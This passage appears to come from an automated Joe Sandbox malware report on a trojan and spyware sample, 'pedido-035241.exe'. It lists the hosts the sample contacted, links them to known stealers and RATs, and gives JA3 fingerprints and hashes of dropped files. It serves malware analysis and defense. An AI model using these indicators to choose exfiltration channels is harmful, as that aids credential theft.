                                                                                                          		high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://reallyfreegeoip.org/xml/msiexec.exe, 00000006.00000002.2981297005.000000002441E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              149.154.167.220
                                                                                                              		api.telegram.orgUnited Kingdom
                                                                                                              		62041TELEGRAMRUfalse
                                                                                                              104.21.67.152
                                                                                                              		reallyfreegeoip.orgUnited States
                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                              193.122.6.168
                                                                                                              		checkip.dyndns.comUnited States
                                                                                                              		31898ORACLE-BMC-31898USfalse
                                                                                                              158.101.44.242
                                                                                                              		unknownUnited States
                                                                                                              		31898ORACLE-BMC-31898USfalse
                                                                                                              172.217.19.174
                                                                                                              		drive.google.comUnited States
                                                                                                              		15169GOOGLEUSfalse
                                                                                                              142.250.181.97
                                                                                                              		drive.usercontent.google.comUnited States
                                                                                                              		15169GOOGLEUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1576204
                                                                                                              Start date and time:2024-12-16 16:31:06 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 7m 2s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:8
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:pedido-035241.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@6/16@6/6
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 50%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 98%
                                                                                                              • Number of executed functions: 83
                                                                                                              • Number of non-executed functions: 32
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 20.109.210.53
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target msiexec.exe, PID 8000 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • VT rate limit hit for: pedido-035241.exe

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              10:32:05API Interceptor42x Sleep call for process: powershell.exe modified
                                                                                                              10:33:29API Interceptor819x Sleep call for process: msiexec.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              149.154.167.220QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                                                RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                                                  104.21.67.152QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                        CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                              SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      193.122.6.168QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      checkip.dyndns.comQUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                      • 132.226.8.169
                                                                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 132.226.8.169
                                                                                                                                                      conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 132.226.8.169
                                                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      reallyfreegeoip.orgQUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 172.67.177.134
                                                                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                      • 172.67.177.134
                                                                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      api.telegram.orgQUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                      • 149.154.167.220

                                                                                                                                                      ASNs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      ORACLE-BMC-31898USQUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 147.154.242.4
                                                                                                                                                      SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      TELEGRAMRUdZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      CLOUDFLARENETUShttps://blackcreekgroup.yardione.com/Account/Login%3Chttps://blackcreekgroup.yardione.com/Account/Login%3EGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.17.25.14
                                                                                                                                                      KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 172.64.41.3
                                                                                                                                                      cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 172.64.41.3
                                                                                                                                                      a2QjbRJVed.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                      • 104.21.26.41
                                                                                                                                                      10lW8PIn6z.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                      • 104.21.67.227
                                                                                                                                                      G7qoACwDbR.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                      • 172.67.218.238
                                                                                                                                                      xrmYUl8OYx.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                      • 104.21.26.41
                                                                                                                                                      fm2r286nqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 172.64.41.3
                                                                                                                                                      https://secure.togethers.best/messeging.html?top=prestons@infra-metals.comGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.21.17.239

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adQUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 104.21.67.152
                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eKjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      https://147.45.47.98/error.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      ak3o7AZ3mH.exeGet hashmaliciousBabadeda, Conti, MimikatzBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#CGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174
                                                                                                                                                      InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174
                                                                                                                                                      nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174
                                                                                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174
                                                                                                                                                      njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174
                                                                                                                                                      T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174
                                                                                                                                                      InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174
                                                                                                                                                      A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174
                                                                                                                                                      KlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 142.250.181.97
                                                                                                                                                      • 172.217.19.174

                                                                                                                                                      Dropped Files

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dlluu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          https://on-combine-data.s3.us-west-2.amazonaws.com/dealer-data/Share+Point/NTAS_MS3000X_Installer_v2.8.25_October2024_NO_UPS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            https://veryfast.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                              SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      https://viture.com/windowsGet hashmaliciousUnknownBrowse
                                                                                                                                                                        GrammarlyInstaller.cl87tH2fwify908jh75b0ag2.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):53158
                                                                                                                                                                          Entropy (8bit):5.062687652912555
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d4qr5zu.gnf.psm1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqf3ummf.4kw.psm1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

